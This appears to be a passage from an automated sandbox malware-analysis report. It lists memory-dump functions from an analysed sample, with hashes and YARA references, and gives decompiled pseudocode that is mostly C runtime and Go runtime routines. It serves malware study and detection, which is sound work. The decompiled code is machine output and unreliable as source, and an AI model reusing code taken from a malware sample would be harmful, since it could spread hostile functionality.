                                                                                                                            • Instruction Fuzzy Hash: C5519A76215B41CAEB18EB18E48039EBBA4F7D8B88F849522EE8D07734DF38C554C718
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ADA5B0 Relevance: 10.6, APIs: 7, Instructions: 108COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3191669884-0
                                                                                                                            • Opcode ID: 34021061f25f4aaf93eb7309e6822a76a1a5c9311dbfd77510108ad3902d63ad
                                                                                                                            • Instruction ID: 56c2d466eaa4297e8e56b0eb57c6af1ccb41ebaab7c5722ea30a6914a7c0e59c
                                                                                                                            • Opcode Fuzzy Hash: 34021061f25f4aaf93eb7309e6822a76a1a5c9311dbfd77510108ad3902d63ad
                                                                                                                            • Instruction Fuzzy Hash: E131BE32508E088FDB56DF189C8976973D2FB58321F2542ADF409C76E2EB30EC4187A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD5034 Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4120058822-0
                                                                                                                            • Opcode ID: 93de5d66caa2dc7aad5c9ab8ee0fc4b3249cab4f79d00ba50f3959950398e7b3
                                                                                                                            • Instruction ID: 0129089ea57d7746c5b7550189b4a34ea80c858a7de7674bb695798d2bdf892e
                                                                                                                            • Opcode Fuzzy Hash: 93de5d66caa2dc7aad5c9ab8ee0fc4b3249cab4f79d00ba50f3959950398e7b3
                                                                                                                            • Instruction Fuzzy Hash: 7C21C523604F048EFB16AB689C9D3797691EB46332F25425DF816C76E3D77C984083B9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A899B0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E0000025B25BF8A899B0(void* __edx, intOrPtr __edi, void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9) {
				void* _v8;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v32;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				long long _v64;
				intOrPtr _v72;
				void* _t26;
				void* _t28;
				void* _t39;
				void* _t40;
				intOrPtr* _t51;
				intOrPtr* _t73;
				void* _t81;

				_t53 = __rbx;
				_t40 = __edx;
				r9d = 0;
				goto 0xf8a899b8;
				_t51 = _t73;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = __rbp;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				 *((long long*)(_t51 + 0x20)) = __rdi;
				_t5 = _t51 - 0x28; // -51
				E0000025B25BF8A7C0AC(_t51, _t5, __r9);
				if (__r8 != 0) goto 0xf8a899f5;
				goto 0xf8a89a87;
				if (__rcx == 0) goto 0xf8a899ff;
				if (__rdx != 0) goto 0xf8a89a16;
				_t26 = E0000025B25BF8A7B89C(_t51);
				 *_t51 = 0x16;
				E0000025B25BF8A7BEC4(_t26);
				goto 0xf8a89a87;
				if (__r8 - __rbx <= 0) goto 0xf8a89a32;
				_t28 = E0000025B25BF8A7B89C(_t51);
				 *_t51 = 0x16;
				E0000025B25BF8A7BEC4(_t28);
				goto 0xf8a89a87;
				if ( *((intOrPtr*)(_v32 + 8)) != 0) goto 0xf8a89a52;
				E0000025B25BF8A8A5A8(_t39, _t40, __edi,  *((intOrPtr*)(_v32 + 8)), __rbx, __rcx, __rdx, __rdx, __rcx, __r8, __r9);
				goto 0xf8a89a87;
				_t10 =  &_v40; // 0x2d
				_v48 =  *((intOrPtr*)(__rdx + 4));
				_v56 = __edi;
				r8d = 0x1001;
				_v64 = __rdx;
				_v72 = __edi;
				if (E0000025B25BF8A8A9F0(_t40,  *((intOrPtr*)(_v32 + 8)), _t51, _t53, _t10,  *((intOrPtr*)(__rdx + 0x220)), __rdx, __r8, __rcx, _t81) == 0) goto 0xf8a89a87;
				_t15 = _t51 - 2; // -2
				if (_v16 == 0) goto 0xf8a89a9a;
				 *(_v24 + 0xc8) =  *(_v24 + 0xc8) & 0xfffffffd;
				return _t15;
			}



















                                                                                                                            0x25bf8a899b0
                                                                                                                            0x25bf8a899b0
                                                                                                                            0x25bf8a899b0
                                                                                                                            0x25bf8a899b3
                                                                                                                            0x25bf8a899b8
                                                                                                                            0x25bf8a899bb
                                                                                                                            0x25bf8a899bf
                                                                                                                            0x25bf8a899c3
                                                                                                                            0x25bf8a899c7
                                                                                                                            0x25bf8a899d7
                                                                                                                            0x25bf8a899e4
                                                                                                                            0x25bf8a899ec
                                                                                                                            0x25bf8a899f0
                                                                                                                            0x25bf8a899f8
                                                                                                                            0x25bf8a899fd
                                                                                                                            0x25bf8a899ff
                                                                                                                            0x25bf8a89a04
                                                                                                                            0x25bf8a89a0a
                                                                                                                            0x25bf8a89a14
                                                                                                                            0x25bf8a89a1e
                                                                                                                            0x25bf8a89a20
                                                                                                                            0x25bf8a89a25
                                                                                                                            0x25bf8a89a2b
                                                                                                                            0x25bf8a89a30
                                                                                                                            0x25bf8a89a3b
                                                                                                                            0x25bf8a89a49
                                                                                                                            0x25bf8a89a50
                                                                                                                            0x25bf8a89a5c
                                                                                                                            0x25bf8a89a61
                                                                                                                            0x25bf8a89a65
                                                                                                                            0x25bf8a89a6c
                                                                                                                            0x25bf8a89a72
                                                                                                                            0x25bf8a89a77
                                                                                                                            0x25bf8a89a82
                                                                                                                            0x25bf8a89a84
                                                                                                                            0x25bf8a89a8c
                                                                                                                            0x25bf8a89a93
                                                                                                                            0x25bf8a89ab6

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3191669884-0
                                                                                                                            • Opcode ID: bb97e2f647bfa3a88a4f54fa0cf94b37a89101f96941e825206f7566504ce103
                                                                                                                            • Instruction ID: e25250f0a42d56135b5d9d7b60007cdc66d6081de6a99f2ecab9861a418c9a7b
                                                                                                                            • Opcode Fuzzy Hash: bb97e2f647bfa3a88a4f54fa0cf94b37a89101f96941e825206f7566504ce103
                                                                                                                            • Instruction Fuzzy Hash: 64314D73204B8089EB229B11EC8C75DB6A4E798BF2F694121FA5817F95DB34C852C734
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01347D60 Relevance: 10.3, Strings: 8, Instructions: 309COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E01347D60(intOrPtr __ecx, signed int __edi, signed int __esi, void* __esp, signed long long __rax, long long __rbx, unsigned int __rdi, signed long long __rsi, long long __rbp, signed long long __r9, void* __r14, long long _a8, long long _a16, intOrPtr _a24, unsigned int _a32, signed long long _a40, signed int _a48) {
				char _v8;
				signed long long _v16;
				signed long long _v24;
				void* _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				signed long long _v64;
				signed long long _v72;
				signed long long _v80;
				signed long long _v88;
				long long _v96;
				signed long long _v104;
				signed long long _v112;
				long long _v120;
				signed long long _v128;
				signed long long _v136;
				char _v140;
				signed int _t157;
				signed int _t205;
				void* _t206;
				long long _t218;
				signed long long _t219;
				long long _t220;
				signed long long _t230;
				signed long long _t231;
				long long _t232;
				signed long long _t243;
				signed long long _t248;
				signed long long _t253;
				long long _t254;
				signed long long _t257;
				signed long long _t259;
				signed long long _t264;
				long long _t268;
				signed long long _t269;
				signed long long _t270;
				signed long long _t271;
				signed long long _t272;
				signed long long _t275;
				signed long long _t277;
				void* _t279;
				signed long long _t280;
				intOrPtr _t282;
				unsigned long long _t283;
				long long _t286;
				long long _t290;
				unsigned long long _t291;
				char* _t294;
				signed long long _t310;
				signed long long _t311;
				signed long long _t312;
				signed long long _t313;
				void* _t316;
				void* _t317;
				void* _t318;

				L0:
				while(1) {
					L0:
					_t317 = __r14;
					_t310 = __r9;
					_t284 = __rsi;
					_t273 = __rdi;
					_t245 = __rbx;
					_t214 = __rax;
					_t206 = __esp;
					_t205 = __esi;
					_t203 = __edi;
					_t199 = __ecx;
					if( &_v64 >  *((intOrPtr*)(__r14 + 0x10))) {
						break;
					}
					L36:
					_a8 = __rax;
					_a16 = __rbx;
					_a24 = __ecx;
					_a32 = __rdi;
					_a40 = __rsi;
					_a48 = r8b;
					E01356200(_t271, __rbp);
					r8d = _a48 & 0x000000ff;
				}
				L1:
				_v8 = __rbp;
				_t294 =  &_v8;
				_a8 = __rax;
				_a16 = __rbx;
				if(__ecx == 0) {
					return 0xffffffff;
				} else {
					if(__rsi == 0) {
						L5:
						if(_t214 == 0) {
							if(r8b == 0 ||  *0x14cf348 != 0) {
								return 0xffffffff;
							} else {
								L01347B80(_t214, _t245, _t294, _t317);
								_v88 = _t214;
								E01332340(_t271, _t294, _t317);
								E01332C40(_t199, _t203, _t205, _t206, 0x138bb10, _t245, _t294, _t317);
								L01332AA0(_t201, _t203, _t206, _v88, _t253, _t294, _t317);
								E013325A0(_t199, _t201, _t203, _t205, _t206, _t294, _t317);
								L013323C0(_t271, _t294, _t317);
								_t218 = 0x13882b2;
								E01330BA0(0x13882b2, _t245, _t294);
								goto L12;
							}
						} else {
							_t271 =  *((intOrPtr*)(_t245 + 0x58));
							_t310 =  *((intOrPtr*)(_t245 + 0x50));
							_t312 =  *((intOrPtr*)(_t245 + 0x60));
							r11d = _t199;
							if(_t271 < _t313) {
								L29:
								_t214 = _t313;
								_t253 = _t271;
								L01358980();
								goto L30;
							} else {
								_a40 = _t284;
								_a48 = r8b;
								_v64 = _t313;
								_v72 = _t312;
								_v16 = _t310;
								_v24 = _t214;
								_v32 = _t245;
								_v80 = _t271;
								_a24 = _t199;
								_a32 = _t273;
								L01347B80(_t214, _t245, _t294, _t317);
								_v128 = _t214;
								_v140 = 0xffffffff;
								_t271 = _v64;
								_t259 = _v72 - _t271;
								_t286 = _v80 - _t271;
								_t275 = _t259;
								_t307 = _v16;
								_t254 = ( ~_t259 >> 0x0000003f & _t271) + _v16;
								L13:
								_v120 = _t286;
								_v56 = _t254;
								_v112 = _t275;
								_v136 = _t214;
								_t219 = _v24;
								L01347B80(_t219, _v32, _t294, _t317);
								r8b = _v128 == _t219;
								_t218 = _v56;
								_t245 = _v120;
								_t253 = _v112;
								_t157 = E01348B40(_t206, _t218, _t245, _t271,  &_v128,  &_v140, _t294, _t307, _t310, _t316, _t317, _t318);
								if(dil == 0) {
									if( *0x14cf348 != 0) {
										L23:
										return 0xffffffff;
									} else {
										_t201 = _a48 & 0x000000ff;
										if((_a48 & 0x000000ff) == 0) {
											goto L23;
										} else {
											_v96 = _t245;
											_v104 = _t253;
											_v40 = _t218;
											_t220 = _v24;
											_t248 = _v32;
											E01348360(_t220, _t248, _t294, _t317);
											_v48 = _t220;
											_v72 = _t248;
											_v88 = _v128;
											E01332340(_t271, _t294, _t317);
											E01332C40(_t199, _t203, _t205, _t206, 0x138d0cf, _t248, _t294, _t317);
											E01332C40(_t199, _t203, _t205, _t206, _v48, _v72, _t294, _t317);
											E01332C40(_t199, _t203, _t205, _t206, 0x138693f, _v72, _t294, _t317);
											L01332AA0(_t201, _t203, _t206, _v88, _v128, _t294, _t317);
											E01332C40(_t199, _t203, _t205, _t206, 0x1387470, _v72, _t294, _t317);
											L01332AA0(_t201, _t203, _t206, _a32, _v128, _t294, _t317);
											E01332C40(_t199, _t203, _t205, _t206, 0x1386a66, _v72, _t294, _t317);
											E01332CC0(_t199, _t201, _t203, _t205, _t206, _v40, _v96, _v104, _t271,  &_v128,  &_v140, _t294, _t317);
											E013325A0(_t199, _t201, _t203, _t205, _t206, _t294, _t317);
											L013323C0(_t271, _t294, _t317);
											_t245 = _v32;
											_t257 =  *((intOrPtr*)(_t245 + 0x58));
											_t271 =  *((intOrPtr*)(_t245 + 0x50));
											_t284 =  *((intOrPtr*)(_t245 + 0x60));
											if(_t257 >= _v64) {
												_v72 = _t284;
												_v16 = _t271;
												_v80 = _t257;
												_t230 = _v24;
												L01347B80(_t230, _t245, _t294, _t317);
												_v128 = _t230;
												_v140 = 0xffffffff;
												_t272 = _v64;
												_t264 = _v72 - _t272;
												_t290 = _v80 - _t272;
												_t280 = _t264;
												_t271 = _v16;
												_t268 = ( ~_t264 >> 0x0000003f & _t272) + _t271;
												while(1) {
													_v120 = _t290;
													_v56 = _t268;
													_v112 = _t280;
													_t231 = _v24;
													L01347B80(_t231, _v32, _t294, _t317);
													r8b = _v128 == _t231;
													_t232 = _v56;
													_t245 = _v120;
													_t269 = _v112;
													_t284 =  &_v140;
													E01348B40(_t206, _t232, _t245, _t271,  &_v128, _t284, _t294, _t307, _t310, _t316, _t317, _t318);
													if(dil == 0) {
														break;
													}
													_v56 = _t232;
													_v120 = _t245;
													_v112 = _t269;
													_v88 = _v128;
													E01332340(_t271, _t294, _t317);
													E01332C40(_t199, _t203, _t205, _t206, 0x1386eaf, _t245, _t294, _t317);
													E01332A40(_t199, _t201, _t203, _t205, _t206, _v140, _t284, _t294, _t317);
													E01332C40(_t199, _t203, _t205, _t206, 0x1387484, _t245, _t294, _t317);
													L01332AA0(_t201, _t203, _t206, _v88, _t269, _t294, _t317);
													E013325A0(_t199, _t201, _t203, _t205, _t206, _t294, _t317);
													L013323C0(_t271, _t294, _t317);
													_t290 = _v120;
													_t280 = _v112;
													_t268 = _v56;
												}
												E01330BA0(0x138b9c0, _t245, _t294);
											}
											L01358980();
											goto L28;
										}
									}
								} else {
									_t271 = _v128;
									_t291 = _a32;
									if(_t291 >= _t271) {
										L12:
										_t286 = _t245;
										_t275 = _t253;
										_t254 = _t218;
										_t214 = _t271;
										goto L13;
									} else {
										_t271 = _a40;
										if(_t271 == 0) {
											L18:
											return _v140;
										} else {
											_t282 =  *((intOrPtr*)(_t317 + 0x30));
											_t270 = _t271;
											_t245 = 0x78bd642f;
											_t201 = _t157 * 0x477563b5d8094cf4 >> 0x20;
											 *((long long*)(_t282 + 0xf0)) = 0x78bd642f;
											_t283 = _t291;
											_t205 = _t205 & 0x00000001;
											_t284 = _t291 >> 3 << 7;
											_t307 = _t270 + _t284;
											r9d =  *((intOrPtr*)(_t270 + _t284 + 8));
											r10d =  *((intOrPtr*)(_t270 + _t284 + 0xc));
											_t313 =  *(_t270 + _t284);
											_t243 = (0x78bd642f +  *((intOrPtr*)(_t282 + 0xf0)) ^ _t271) << 3 >> 0x20;
											if(0x78bd642f >= 8) {
												L28:
												_t199 = 8;
												E013588C0();
												goto L29;
											} else {
												 *(_t307 + 0x78bd642f) = _t313;
												 *((intOrPtr*)(_t307 + 0xa0761d6478bd6437)) = r9d;
												 *((intOrPtr*)(_t307 + (_t243 << 4) + 0xc)) = r10d;
												 *(_t270 + _t284) = _t283;
												 *((intOrPtr*)(_t270 + _t284 + 8)) = _a24;
												 *((intOrPtr*)(_t270 + _t284 + 0xc)) = _v140;
												goto L18;
											}
										}
									}
								}
							}
						}
					} else {
						_t271 = __rdi;
						_t277 = __rdi >> 3;
						_t203 = __edi & 0x00000001;
						r9d = 0;
						L31:
						if(_t310 >= 8) {
							_t273 = _t271;
							goto L5;
						} else {
							_t312 = _t277;
							_t279 = (_t277 << 7) + _t284;
							_t313 = _t310;
							_t311 = _t310 << 4;
							r12d =  *((intOrPtr*)(_t279 + _t311 + 8));
							if(r12d != _t199 ||  *((intOrPtr*)(_t279 + _t311)) != _t271) {
								L30:
								_t310 = _t313 + 1;
								_t277 = _t312;
								goto L31;
							} else {
								return  *((intOrPtr*)(_t279 + _t311 + 0xc));
							}
						}
					}
				}
			}



























































                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d60
                                                                                                                            0x01347d69
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01348316
                                                                                                                            0x01348316
                                                                                                                            0x0134831b
                                                                                                                            0x01348320
                                                                                                                            0x01348324
                                                                                                                            0x01348329
                                                                                                                            0x0134832e
                                                                                                                            0x01348333
                                                                                                                            0x01348350
                                                                                                                            0x01348350
                                                                                                                            0x01347d6f
                                                                                                                            0x01347d76
                                                                                                                            0x01347d7e
                                                                                                                            0x01347d86
                                                                                                                            0x01347d8e
                                                                                                                            0x01347d98
                                                                                                                            0x01347dc8
                                                                                                                            0x01347d9a
                                                                                                                            0x01347d9d
                                                                                                                            0x01347dc9
                                                                                                                            0x01347dcc
                                                                                                                            0x01347e7a
                                                                                                                            0x01347e9b
                                                                                                                            0x01347ea0
                                                                                                                            0x01347ea0
                                                                                                                            0x01347ea5
                                                                                                                            0x01347eaa
                                                                                                                            0x01347ec0
                                                                                                                            0x01347eca
                                                                                                                            0x01347ecf
                                                                                                                            0x01347ed4
                                                                                                                            0x01347ed9
                                                                                                                            0x01347ee5
                                                                                                                            0x00000000
                                                                                                                            0x01347ee5
                                                                                                                            0x01347dd2
                                                                                                                            0x01347dd2
                                                                                                                            0x01347dd6
                                                                                                                            0x01347dda
                                                                                                                            0x01347dde
                                                                                                                            0x01347de4
                                                                                                                            0x013482bb
                                                                                                                            0x013482bb
                                                                                                                            0x013482be
                                                                                                                            0x013482c1
                                                                                                                            0x00000000
                                                                                                                            0x01347dea
                                                                                                                            0x01347dea
                                                                                                                            0x01347df2
                                                                                                                            0x01347dfa
                                                                                                                            0x01347e02
                                                                                                                            0x01347e07
                                                                                                                            0x01347e0f
                                                                                                                            0x01347e17
                                                                                                                            0x01347e1f
                                                                                                                            0x01347e24
                                                                                                                            0x01347e2b
                                                                                                                            0x01347e33
                                                                                                                            0x01347e38
                                                                                                                            0x01347e3d
                                                                                                                            0x01347e4a
                                                                                                                            0x01347e52
                                                                                                                            0x01347e5a
                                                                                                                            0x01347e5d
                                                                                                                            0x01347e6a
                                                                                                                            0x01347e72
                                                                                                                            0x01347ef6
                                                                                                                            0x01347ef6
                                                                                                                            0x01347efb
                                                                                                                            0x01347f03
                                                                                                                            0x01347f08
                                                                                                                            0x01347f15
                                                                                                                            0x01347f20
                                                                                                                            0x01347f2a
                                                                                                                            0x01347f2e
                                                                                                                            0x01347f36
                                                                                                                            0x01347f3b
                                                                                                                            0x01347f4a
                                                                                                                            0x01347f52
                                                                                                                            0x01348033
                                                                                                                            0x013481b0
                                                                                                                            0x013481c6
                                                                                                                            0x01348039
                                                                                                                            0x01348039
                                                                                                                            0x01348043
                                                                                                                            0x00000000
                                                                                                                            0x01348049
                                                                                                                            0x01348049
                                                                                                                            0x0134804e
                                                                                                                            0x01348053
                                                                                                                            0x0134805b
                                                                                                                            0x01348063
                                                                                                                            0x0134806b
                                                                                                                            0x01348070
                                                                                                                            0x01348078
                                                                                                                            0x01348082
                                                                                                                            0x01348087
                                                                                                                            0x01348098
                                                                                                                            0x013480aa
                                                                                                                            0x013480c0
                                                                                                                            0x013480ca
                                                                                                                            0x013480e0
                                                                                                                            0x013480ed
                                                                                                                            0x01348100
                                                                                                                            0x01348117
                                                                                                                            0x01348120
                                                                                                                            0x01348125
                                                                                                                            0x0134812a
                                                                                                                            0x01348132
                                                                                                                            0x01348136
                                                                                                                            0x0134813a
                                                                                                                            0x01348149
                                                                                                                            0x0134814f
                                                                                                                            0x01348154
                                                                                                                            0x0134815c
                                                                                                                            0x01348161
                                                                                                                            0x01348169
                                                                                                                            0x0134816e
                                                                                                                            0x01348173
                                                                                                                            0x01348180
                                                                                                                            0x01348188
                                                                                                                            0x01348190
                                                                                                                            0x01348193
                                                                                                                            0x013481a0
                                                                                                                            0x013481a8
                                                                                                                            0x01348241
                                                                                                                            0x01348241
                                                                                                                            0x01348246
                                                                                                                            0x0134824e
                                                                                                                            0x01348253
                                                                                                                            0x01348263
                                                                                                                            0x0134826d
                                                                                                                            0x01348271
                                                                                                                            0x01348279
                                                                                                                            0x0134827e
                                                                                                                            0x01348288
                                                                                                                            0x0134828d
                                                                                                                            0x01348295
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013481c7
                                                                                                                            0x013481cf
                                                                                                                            0x013481d4
                                                                                                                            0x013481de
                                                                                                                            0x013481e3
                                                                                                                            0x013481f4
                                                                                                                            0x01348200
                                                                                                                            0x01348211
                                                                                                                            0x01348220
                                                                                                                            0x01348225
                                                                                                                            0x0134822a
                                                                                                                            0x0134822f
                                                                                                                            0x01348234
                                                                                                                            0x01348239
                                                                                                                            0x01348239
                                                                                                                            0x013482a7
                                                                                                                            0x013482a7
                                                                                                                            0x013482ac
                                                                                                                            0x00000000
                                                                                                                            0x013482ac
                                                                                                                            0x01348043
                                                                                                                            0x01347f58
                                                                                                                            0x01347f58
                                                                                                                            0x01347f5d
                                                                                                                            0x01347f68
                                                                                                                            0x01347eea
                                                                                                                            0x01347eea
                                                                                                                            0x01347eed
                                                                                                                            0x01347ef0
                                                                                                                            0x01347ef3
                                                                                                                            0x00000000
                                                                                                                            0x01347f6a
                                                                                                                            0x01347f6a
                                                                                                                            0x01347f75
                                                                                                                            0x01348013
                                                                                                                            0x0134802b
                                                                                                                            0x01347f7b
                                                                                                                            0x01347f7b
                                                                                                                            0x01347f9d
                                                                                                                            0x01347fa0
                                                                                                                            0x01347fa3
                                                                                                                            0x01347fa8
                                                                                                                            0x01347faf
                                                                                                                            0x01347fb6
                                                                                                                            0x01347fb9
                                                                                                                            0x01347fbd
                                                                                                                            0x01347fc1
                                                                                                                            0x01347fc6
                                                                                                                            0x01347fcb
                                                                                                                            0x01347fd8
                                                                                                                            0x01347fe4
                                                                                                                            0x013482b1
                                                                                                                            0x013482b1
                                                                                                                            0x013482b6
                                                                                                                            0x00000000
                                                                                                                            0x01347fea
                                                                                                                            0x01347fee
                                                                                                                            0x01347ff2
                                                                                                                            0x01347ff7
                                                                                                                            0x01348000
                                                                                                                            0x0134800b
                                                                                                                            0x0134800f
                                                                                                                            0x00000000
                                                                                                                            0x0134800f
                                                                                                                            0x01347fe4
                                                                                                                            0x01347f75
                                                                                                                            0x01347f68
                                                                                                                            0x01347f52
                                                                                                                            0x01347de4
                                                                                                                            0x01347da0
                                                                                                                            0x01347da0
                                                                                                                            0x01347da3
                                                                                                                            0x01347da7
                                                                                                                            0x01347daa
                                                                                                                            0x013482cd
                                                                                                                            0x013482d1
                                                                                                                            0x0134830e
                                                                                                                            0x00000000
                                                                                                                            0x013482d3
                                                                                                                            0x013482d3
                                                                                                                            0x013482da
                                                                                                                            0x013482dd
                                                                                                                            0x013482e0
                                                                                                                            0x013482e4
                                                                                                                            0x013482ec
                                                                                                                            0x013482c6
                                                                                                                            0x013482c6
                                                                                                                            0x013482ca
                                                                                                                            0x00000000
                                                                                                                            0x013482f7
                                                                                                                            0x0134830d
                                                                                                                            0x0134830d
                                                                                                                            0x013482ec
                                                                                                                            0x013482d1
                                                                                                                            0x01347d9d

                                                                                                                            Strings
                                                                                                                            • no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.full != 0 with G, xrefs: 01347ED9
                                                                                                                            • pc= sp: sp=) = ) m=+Inf-Inf: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3tcp4trueudp4uint, xrefs: 013480AF
                                                                                                                            • runtime: no module data for save on system g not allowedunreserving unaligned regionCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListN. Central Asia Standard TimeNorth Asia East Standard Timead, xrefs: 01347EAF
                                                                                                                            • targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGetIfEntryGetVersionGlagoliticKharoshthiLockFileExManichaeanOld_ItalicOld_PermicOld_TurkicOther_Math, xrefs: 013480CF
                                                                                                                            • invalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attachedregion exceeds uintptr rangeruntime., xrefs: 0134829B
                                                                                                                            • tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41, xrefs: 013480F2
                                                                                                                            • value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBaline, xrefs: 013481E8
                                                                                                                            • runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackuncachin, xrefs: 0134808C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
